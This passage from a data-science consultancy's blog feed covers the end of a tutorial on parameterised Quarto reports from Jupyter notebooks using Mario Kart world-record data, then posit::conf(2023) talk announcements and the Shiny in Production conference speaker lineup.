in the rendered document (as can be seen &lt;a href="https://jumpingrivers.github.io/blog/mario_cell_embedding.html" rel="external"&gt;here&lt;/a&gt;).&lt;/p&gt;
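&lt;p&gt;If an embed cannot find its cell, it can help to check which labels a notebook actually contains. The sketch below is not part of Quarto. It assumes the labels were set with a &lt;code&gt;#| label:&lt;/code&gt; comment at the top of each code cell, and the helper names &lt;code&gt;cell_label&lt;/code&gt; and &lt;code&gt;labelled_cells&lt;/code&gt; are hypothetical. It uses a small stand-in notebook rather than the real &lt;code&gt;rainbow_road.ipynb&lt;/code&gt;:&lt;/p&gt;

```python
def cell_label(cell):
    """Return the `#| label:` value of a code cell, or None if it has none."""
    if cell.get("cell_type") != "code":
        return None
    source = cell.get("source", "")
    # nbformat stores the source as either one string or a list of lines
    text = source if isinstance(source, str) else "".join(source)
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped.startswith("#|"):
            break  # assumption: cell options sit in a block at the top of the cell
        key, _, value = stripped[2:].partition(":")
        if key.strip() == "label":
            return value.strip()
    return None


def labelled_cells(notebook):
    """Map each label to the index of the cell that carries it."""
    labels = {}
    for index, cell in enumerate(notebook["cells"]):
        label = cell_label(cell)
        if label is not None:
            labels[label] = index
    return labels


# Stand-in notebook for illustration; a real .ipynb file is JSON with the
# same "cells" layout and could be loaded with json.load instead.
example = {
    "cells": [
        {"cell_type": "markdown", "source": ["# Rainbow Road"]},
        {"cell_type": "code", "source": ["import plotly.express as px\n"]},
        {"cell_type": "code", "source": ["#| label: wr-plot\n", "fig.show()\n"]},
    ]
}

print(labelled_cells(example))
```

&lt;p&gt;Here only the third cell carries a label, so it is the one an embed of &lt;code&gt;#wr-plot&lt;/code&gt; would pick up.&lt;/p&gt;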
&lt;h3 id="parameterised-reports"&gt;Parameterised Reports&lt;/h3&gt;
&lt;p&gt;Above we produced a report for the Rainbow Road world records on Mario Kart 64.
There are 16 tracks in total in the game. What if we wanted to replicate this
report for each track? With Quarto and Jupyter notebooks we can define a set of
parameters to easily create different variations of a report.&lt;/p&gt;
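&lt;p&gt;Once the notebook exposes a &lt;code&gt;track&lt;/code&gt; parameter (set up in the steps that follow), producing one report per track comes down to repeating the render command with a different &lt;code&gt;-P&lt;/code&gt; value. The sketch below only builds the commands, so it runs without Quarto installed. The &lt;code&gt;slugify&lt;/code&gt; and &lt;code&gt;render_command&lt;/code&gt; helpers are hypothetical names, and the &lt;code&gt;--output&lt;/code&gt; option is added on the assumption that each track should get its own output file rather than overwriting the previous one:&lt;/p&gt;

```python
import re
import shlex

NOTEBOOK = "mario_kart.ipynb"  # notebook name used in this post


def slugify(track):
    """Turn a track name into a lowercase, underscore-separated file stem."""
    return re.sub(r"[^a-z0-9]+", "_", track.lower()).strip("_")


def render_command(track, notebook=NOTEBOOK):
    """Build the argument list for one parameterised `quarto render` call."""
    return [
        "quarto", "render", notebook,
        "-P", f"track:{track}",
        # Assumption: write each report to its own file
        "--output", f"{slugify(track)}.html",
        "--execute",
    ]


# Only the three tracks named in this post; extend the list as needed.
tracks = ["Rainbow Road", "Choco Mountain", "Moo Moo Farm"]
commands = [render_command(track) for track in tracks]

for command in commands:
    # shlex.join quotes arguments that contain spaces for display
    print(shlex.join(command))
```

&lt;p&gt;Each argument list can then be handed to &lt;code&gt;subprocess.run(command, check=True)&lt;/code&gt; to perform the render. Passing a list rather than a single string avoids having to quote track names that contain spaces.&lt;/p&gt;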
&lt;p&gt;To parameterise a Jupyter notebook we need to create a cell with a &amp;ldquo;parameters&amp;rdquo;
tag. To add a parameters tag to a Python cell in VS Code, click on &amp;ldquo;&amp;hellip;&amp;rdquo; (More
Actions) in the cell toolbar and select &amp;ldquo;Add Cell Tag&amp;rdquo;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot depicting how to add a tag to a notebook cell. The cell actions are expanded by clicking on the symbol with three dots in the cell tool bar. The “Add Cell Tag” option is visible in the dropdown list." height="auto" id="h-rh-i-3" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/add-cell-tag.png" width="1736"&gt;&lt;/p&gt;
&lt;p&gt;To add a parameters tag we then just type &amp;ldquo;parameters&amp;rdquo; into the pop-up box:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot showing the pop up box that appears after selecting the “Add Cell Tag” option. A parameters tag is added by typing “parameters” into the box and pressing Enter." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/vscode-tag-box.png" width="1219"&gt;&lt;/p&gt;
&lt;p&gt;The cell should now have a &amp;ldquo;parameters&amp;rdquo; tag:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot showing a code cell after it has been assigned a parameters tag. A “parameters” label is now visible at the lower-left corner of the cell, with an option to add another tag to the right of it." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/graphics/vscode-parameters-tag.png" width="1728"&gt;&lt;/p&gt;
&lt;p&gt;If we want to have the track as a parameter in the report, we can define a
&lt;code&gt;track&lt;/code&gt; variable in the tagged cell (as above):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rainbow Road&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then use this variable in the remainder of our notebook. For example, it can be used to set the track filter in the data-loading code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the records data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Filter the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;course_records &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; records&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loc[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;track&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; track) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (records[&lt;span style="color:#a5d6ff"&gt;&amp;#34;type&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Three Lap&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;reset_index()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full code for our parameterised &lt;code&gt;mario_kart.ipynb&lt;/code&gt; notebook can be found
&lt;a href="https://github.com/jumpingrivers/blog/blob/main/blogs/2023-quarto-for-jupyter/mario_kart.ipynb" rel="external"&gt;here&lt;/a&gt;.
In this example we have used &lt;code&gt;&amp;quot;Rainbow Road&amp;quot;&lt;/code&gt; as the
default value for our &lt;code&gt;track&lt;/code&gt; parameter. Running the following will therefore
generate a report for Rainbow Road:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render mario_kart.ipynb --execute
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we want to report on the &lt;code&gt;&amp;quot;Moo Moo Farm&amp;quot;&lt;/code&gt; world records instead, we can pass
this to the &lt;code&gt;track&lt;/code&gt; parameter on the command line using the &lt;code&gt;-P&lt;/code&gt; flag:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render mario_kart.ipynb -P track:&lt;span style="color:#a5d6ff"&gt;&amp;#34;Moo Moo Farm&amp;#34;&lt;/span&gt; --execute
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You may have noticed that running the above command actually inserts a cell
defining the &lt;code&gt;track&lt;/code&gt; variable as &amp;ldquo;Moo Moo Farm&amp;rdquo; into &lt;code&gt;mario_kart.ipynb&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Injected Parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Moo Moo Farm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;ve only covered using Jupyter and Quarto from VS Code in this post. The
&lt;a href="https://quarto.org/docs/tools/jupyter-lab-extension.html" rel="external"&gt;Quarto documentation&lt;/a&gt;
contains details on how to set up Jupyter Lab with Quarto.&lt;/p&gt;
&lt;p&gt;Quarto is also used by the nbdev platform, which enables developers to write
software with high-quality documentation in a notebook-driven environment.
Check out the &lt;a href="https://nbdev.fast.ai/" rel="external"&gt;nbdev documentation&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>posit::conf(2023)</title><link>https://www.jumpingrivers.com/blog/posit-conf-2023/</link><pubDate>Thu, 14 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-conf-2023/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-conf-2023/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-conf-2023/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our bags are packed, flights are booked, and we&amp;rsquo;re ready to head stateside for &lt;a href="https://posit.co/conference/" rel="external"&gt;posit::conf(2023)&lt;/a&gt;. We&amp;rsquo;re excited to be sponsoring the event this year, as well as presenting &lt;a href="https://reg.conf.posit.co/flow/posit/positconf23/attendee-portal/page/sessioncatalog?search=Jumping%20Rivers" rel="external"&gt;a few talks ourselves&lt;/a&gt;. You&amp;rsquo;ll be able to find Colin, Liam and Rich at the Jumping Rivers exhibition stand all week. Come along, say hello, and get your hands on one of our coveted JR coasters.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-posit-conf-highlights"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-road-to-easier-shiny-app-deployments---liam-kalita"&gt;The Road to Easier Shiny App Deployments - Liam Kalita&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;15:00 CDT - Tuesday 19th September&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re often helping developers to assess, fix and improve their Shiny apps, and often the first thing we do is see if we can deploy the app. If you can&amp;rsquo;t deploy your Shiny app, it&amp;rsquo;s a waste of time. If you can deploy it successfully, then at the very least it runs, so we&amp;rsquo;ve got something to work with. There are a bunch of reasons why apps fail to deploy. They can be easy to fix, like hardcoded secrets, fonts, or missing libraries. Or they can be intractable and super frustrating to deal with, like manifest mismatches, resource starvation, and missing libraries. At the end of this talk, I want you to know how to identify, investigate and proactively prevent Shiny app deployment failures from happening.&lt;/p&gt;
&lt;h3 id="getting-the-most-out-of-git---colin-gillespie"&gt;Getting the Most Out of Git - Colin Gillespie&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;16:00 CDT - Tuesday 19th September&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Did you believe that Git would solve all of your data science worries? Instead, you&amp;rsquo;ve been plunged HEAD~1 first into merging (or is that rebasing?) chaos. Issues are ignored, branches are everywhere, main never works, and no one really knows who owns the repository.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t worry! There are ways to escape this pit of despair. Over the last few years, we&amp;rsquo;ve worked with many data science teams. During this time, we&amp;rsquo;ve spotted common patterns and also common pitfalls. While one size does not fit all, there are golden rules that should be followed. At the end of this talk, you&amp;rsquo;ll understand the processes other data science teams implement to make Git work for them.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-conf-2023/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Full speaker lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/</link><pubDate>Thu, 07 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference! Don&amp;rsquo;t miss out on this excellent set of talks and workshops - head over to the conference website to sign up now!&lt;/p&gt;
&lt;h3 id="workshops"&gt;Workshops&lt;/h3&gt;
&lt;p&gt;This year&amp;rsquo;s workshops consist of two delivered by our JR trainers, and one by a special guest, Andrie de Vries of Posit!&lt;/p&gt;
&lt;h4 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Introduction to Shiny for Python&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This workshop provides an introduction to coding a web application using Shiny for Python. It is aimed at providing R users who are already familiar with Shiny with the tools and understanding to write similar apps using Python. In addition to using Shiny for Python yourself, this will also give you the capability to discuss Shiny with your Python colleagues, for example when you work in a bilingual data science team.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Andrie is Director of Product Strategy at Posit (formerly RStudio) where he works on the Posit commercial products. He started using R in 2009 for market research statistics, and later joined Revolution Analytics and then Microsoft, where he helped customers implement advanced analytics and machine learning workflows. To keep healthy, he practices yoga and does some recreational running and canoeing.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="keith-newman---jumping-rivers"&gt;Keith Newman - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Building Responsive Shiny Applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents challenges when designing an application that works well for all users. Enter responsive design: the practice of building fluid web pages that “work” on huge 4k and 5k monitors, tiny smartphones and all things in between. This course will look at responsive design principles and best practices for Shiny developers, covering page layout, easy-to-add widgets and some simple CSS tricks for when built-in solutions don’t quite cut it.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/keith@2x.jpg" alt="Photo of Keith Newman" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Following a PhD in statistics at Newcastle University, Keith developed software to improve road safety modelling. He enjoys creating Shiny apps and teaching the use of R.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="russ-hyde---jumping-rivers"&gt;Russ Hyde - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny Testing&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Automated testing plays a vital role in any production-grade software project. But what benefit does well-tested code bring to a project, and how do you write a good test suite for your Shiny application? In this workshop, we demonstrate how to document the behaviour of an application using browser-driven end-to-end tests and show that lower-level, module- or function-focussed tests make development a happier and more predictable experience. The tools used here (shinytest2, testServer) all build upon the testthat package.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Russ Hyde" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Russ has previously worked in molecular biology and bioinformatics. He holds a PhD in Molecular Physiology and an MSc in Mathematics. Russ is an author of several CRAN packages and a mentor in the R for Data Science community.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-full-lineup"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;p&gt;The second day of the conference will consist of a great line-up of talks from speakers across a variety of industries!&lt;/p&gt;
&lt;h4 id="keynote-george-stagg---posit"&gt;&lt;strong&gt;Keynote:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/george-w-stagg/" rel="external"&gt;George Stagg&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;R Shiny without a server: webR and Shinylive&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;WebAssembly (Wasm) is a technology that enables software that’s normally compiled for a specific computer system to instead run anywhere, including inside web browsers. WebR is a version of the R interpreter compiled for Wasm, bringing this technology to the R world.&lt;/p&gt;
&lt;p&gt;Earlier this year, the initial version of webR was released and users have already begun building new interactive experiences with R on the web. The latest release, version 0.2.0, includes improvements to graphics, accessibility and internationalisation, developer API updates, and introduces a new webR REPL app. The release also includes expanded support for Wasm R packages, including the ability to run fully client-side Shiny apps.&lt;/p&gt;
&lt;p&gt;In this talk, I’ll introduce webR with some simple examples and discuss some details of how the system works. I’ll talk about how JavaScript APIs can be used to integrate webR into wider web applications and describe webR’s communication channel. Finally, I’ll give a description of how Shiny apps can be run using webR without an R server, ending with a demo of an in-development “Shinylive for R”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/george@2x.jpg" alt="Photo of George Stagg" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;George is a software engineer working on the webR project as part of the Open Source Team at Posit Software PBC. A former academic, George also has experience with teaching and research in computational mathematics, statistics and physics. When not working with software, George enjoys hacking hardware, photography, fantasy &amp;amp; sci-fi, and tinkering with electronic synthesisers.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="keynote-cara-thompson---freelance-data-consultant"&gt;&lt;strong&gt;Keynote:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; - &lt;a href="https://linktr.ee/cararthompson" rel="external"&gt;Freelance Data Consultant&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Data. It&amp;rsquo;s complicated! And there are often many facets to our data stories, which we need to present succinctly enough for our readers to want to engage with. On top of that, it changes! If we want our apps to reflect up-to-date data, how do we make sure the annotations stay up to date, and don&amp;rsquo;t end up off the edge of the plot or on top of each other with the next batch of data?&lt;/p&gt;
&lt;p&gt;In this talk, we will explore how to make text work for us, by first considering how much of it we really need. Once we&amp;rsquo;ve decluttered and explored how we can use colours to make our plots less text-dependent, we&amp;rsquo;ll look at how to optimise text hierarchy in descriptions and in-plot annotations to keep the main thing the main thing, and how to create dynamic content and alignments for our titles, subtitles, axes, and annotations. Finally, we&amp;rsquo;ll explore coding tricks to apply these typography tips to tables and interactive plots, giving readers additional information on demand. Throughout the talk, I will share the packages and code snippets used to create and modify plots in R straight from readily available data, as well as tools which we can use to check for accessibility in our dataviz design decisions.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Cara is a freelance data consultant with an academic background, specialising in dataviz and in &amp;ldquo;enhanced&amp;rdquo; reproducible outputs. She lives in Edinburgh, Scotland, and is passionate about maximising the impact of other people&amp;rsquo;s expertise.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="naomi-bradbury-clareece-nevill--janion-nevill---complex-reviews-support-unit"&gt;Naomi Bradbury, Clareece Nevill &amp;amp; Janion Nevill - &lt;a href="https://www.gla.ac.uk/research/az/evidencesynthesis/apps-materials-guidence/" rel="external"&gt;Complex Reviews Support Unit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Health Data Scientists Developing Production Grade Shiny Apps&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In 2017 a group of Biostatisticians at the University of Leicester embarked on two mini-projects to investigate the feasibility of using R Shiny apps to perform meta-analyses. Six years later, we have produced a suite of four R Shiny apps that automate network meta-analysis and diagnostic test accuracy meta-analysis, allowing researchers and healthcare professionals to access cutting-edge statistical analysis techniques without the need to write their own code. We also have two further apps currently in development. Our apps have approximately 1,000 user hours each month across the globe, and they have been used to conduct numerous published meta-analyses and in the development of clinical guidelines.&lt;/p&gt;
&lt;p&gt;In this talk, we will give an overview of the project and the lessons we have learned (and are still learning) along the way as research scientists entering the world of software development, and how the power of R Shiny has enabled us to achieve this. We will discuss:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How we transitioned from working individually on apps to creating a research software development team&lt;/li&gt;
&lt;li&gt;Leveraging existing R analysis packages to avoid ‘reinventing the wheel’ and ensuring our users could be confident in the accuracy of the results delivered&lt;/li&gt;
&lt;li&gt;Developing novel data visualisations available within the MetaInsight and MetaDTA apps&lt;/li&gt;
&lt;li&gt;Creating a living network meta-analysis of treatments for COVID-19 during the pandemic using a combination of R Shiny, Python and a Raspberry Pi&lt;/li&gt;
&lt;li&gt;The changing landscape of Shiny app development and journal publication of apps across the time span of the project.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speakers&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/crsu@2x.jpg" alt="CRSU logo" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Naomi, Clareece and Janion are part of the Complex Reviews Support Unit (CRSU) based at the University of Leicester. The CRSU began in 2015 as a support group of experts in the field of evidence synthesis, but now includes a strong interdisciplinary team primarily tasked with developing and maintaining the CRSU’s suite of Shiny apps for assisting evidence synthesis.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="chris-brownlie---barnett-waddingham"&gt;&lt;a href="https://www.linkedin.com/in/cnbrownlie/" rel="external"&gt;Chris Brownlie&lt;/a&gt; - &lt;a href="https://www.barnett-waddingham.co.uk/" rel="external"&gt;Barnett Waddingham&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Anatomy of a Shiny app&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Have you ever wondered what really goes on under the hood of a Shiny app? What the building blocks are and how they fit together to enable us to build reactive web apps using R? Shiny apps are made up of a collection of objects that all link with each other and external sources to make the app work. These objects and methods interact in various ways in order to: start up the app, build the reactive graph, handle reactivity and much more. In addition to this, the inner workings of Shiny rely on the use of other, less well-known R packages.&lt;/p&gt;
&lt;p&gt;In this presentation I&amp;rsquo;ll be exploring the building blocks of Shiny - such as the Shiny Session, reactive context and reactive log - as well as the key functions provided by Shiny&amp;rsquo;s dependencies, giving a high-level overview of how they fit together and what they are each responsible for in the lifecycle of an app. I&amp;rsquo;ll also discuss how understanding these can be useful when debugging or monitoring a production Shiny app.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/chris@2x.jpg" alt="Photo of Chris Brownlie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Chris is an analytics consultant in the Management Decision Analytics team at Barnett Waddingham, specialising in R and Shiny-app development. He comes from a background in data science and formerly worked in the public sector. Besides coding he enjoys rugby, reading fantasy books and spending time with his dog, Nero.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="colin-gillespie---jumping-rivers"&gt;&lt;a href="https://www.linkedin.com/in/colin-gillespie-25028332/" rel="external"&gt;Colin Gillespie&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Securing Shiny Dashboards&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Shiny apps, R Markdown reports and Flask dashboards provide a rich user experience for relatively little development time. Often this experience is created by utilising third-party JavaScript functions, CSS files, fonts and images, but every external file we use means we implicitly trust the authors. The NHS and thousands of other government websites can attest that this is an issue; in 2018, they ran scripts that made their visitors use their computing power to mine cryptocurrencies.&lt;/p&gt;
&lt;p&gt;This talk will look at how organisations can improve their Shiny application security. We’ll discuss general procedures for securing your overall workflow, such as security audits of your R packages and general Git security. We’ll then see how Content Security Policies (CSPs) can be leveraged in Shiny apps, which allow a website to specify what external content a site can access. This talk will discuss implementing these precautions within Shiny and Posit Connect. We&amp;rsquo;ll demonstrate that securing and monitoring your applications is relatively straightforward.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/colin@2x.jpg" alt="Photo of Colin Gillespie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Colin has been using R since 1999. He&amp;rsquo;s the author of a number of R packages and has published the book Efficient R Programming with O&amp;rsquo;Reilly.&lt;/p&gt;
